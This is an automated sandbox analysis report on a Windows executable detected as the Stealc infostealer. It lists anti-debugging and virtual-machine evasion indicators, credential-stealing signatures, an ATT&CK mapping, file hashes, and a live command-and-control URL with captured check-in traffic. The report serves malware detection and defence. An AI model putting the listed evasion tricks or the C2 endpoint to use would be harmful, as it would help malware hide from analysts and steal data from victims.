                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B20B16 second address: B20B24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B20B24 second address: B20B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B20B28 second address: B20B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB9C8FCBEA3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FB9C8FCBE96h 0x00000016 jl 00007FB9C8FCBE96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B20B52 second address: B20B5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B20B5C second address: B20B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5180338 second address: 518033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 518033E second address: 5180342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5180374 second address: 518037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 518037A second address: 518038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov ax, F891h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov al, 28h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 518038C second address: 51803A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FB9C8FCDCABh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803A9 second address: 51803AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803AD second address: 51803B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803B3 second address: 51803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803B9 second address: 51803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803BD second address: 51803D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9C8FCBE9Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803D4 second address: 51803E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 891A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: ABCBDE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_006438B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00644910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00644910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0063DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0063E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00644570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00644570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0063ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0063BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0063DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006316D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00643EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00643EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0063F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00631160 GetSystemInfo,ExitProcess | 0_2_00631160
                Source: file.exe, file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1787435060.00000000014A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWz
                Source: file.exe, 00000000.00000002.1787435060.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787435060.0000000001473000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13432
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13451
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13429
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13483
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13443
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006345C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_006345C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00649860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649750 mov eax, dword ptr fs:[00000030h] | 0_2_00649750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00647850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00647850
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00649600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00649600
                Source: file.exe, file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: <_Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00647B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00646920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00646920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00647850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00647850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00647A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00647A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (numbers in parentheses are the matched-signature counts shown in the report)

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (12), DLL Side-Loading (1)
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 17% | Virustotal
                http://185.215.113.37/e2b1563c6670f193.phpO | 17% | Virustotal
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpO | file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | true | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmp | true | unknown
                http://185.215.113.37t | file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1525381
                  Start date and time:2024-10-04 04:40:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:1
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 80
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 185.215.113.43
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.951230291721707
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'846'272 bytes
                  MD5:93db12453ac29ad390cbd66f4b6dfd52
                  SHA1:14dc9072be488c339f9c2bbc3711d9793bb7218b
                  SHA256:afd87eeb51cb2bd9ed4b52f0151ddf1f540d6c9fffb433eab0063c7edf1d093f
                  SHA512:e6bcafe83356e62d24be04888c7b303cf7d873a2363dca7759602ff2f3b04193999e20499d70d12a46356e33da3f4193d583b462160f8bf3f57d1ca62274fe65
                  SSDEEP:24576:bmihk7ZuwYJ+DCdrYD/dqwE2rXMp7kJ/6u6X0yfDAghh4V9OgYX1OzckEg8tvzWJ:hkzcygNkJCuViQ9xDE9anp0pRs/DcW1
                  TLSH:9F853333312E905FE829B53A1CFF530325E3CA11C1A699B4BC6F1A7D1E0D2D9E19E819
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0xa9a000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007FB9C84F3CAAh
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  (unprintable name) | 0x1000 | 0x25b000 | 0x22800 | ad8a4a57d7dd56efbf9a17d0adbe4a4c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  (unprintable name) | 0x25e000 | 0x29e000 | 0x200 | b2d88feca93f03b01307f45a2dcc3795 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  bgdhafsv | 0x4fc000 | 0x19d000 | 0x19ca00 | 7b77b8360aab0524f538c163188d9f9e | False | 0.9946423668963951 | data | 7.952703648524724 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  xszuyfga | 0x699000 | 0x1000 | 0x400 | 279043e52a0f705de5fced6602e16f29 | False | 0.7880859375 | data | 6.201469284257068 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant | 0x69a000 | 0x3000 | 0x2200 | 2fa7b6d6f70a7836e659824e45119147 | False | 0.38522518382352944 | DOS executable (COM) | 4.196042803354581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  DLL | Import
                  kernel32.dll | lstrcpy
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-10-04T04:41:07.170847+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 4, 2024 04:41:06.250785112 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:06.257237911 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 4, 2024 04:41:06.257421017 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:06.257903099 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:06.267934084 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 4, 2024 04:41:06.945116997 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 4, 2024 04:41:06.945193052 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:06.948136091 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:06.952996016 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 4, 2024 04:41:07.170490026 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                  Oct 4, 2024 04:41:07.170846939 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                  Oct 4, 2024 04:41:09.957885981 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
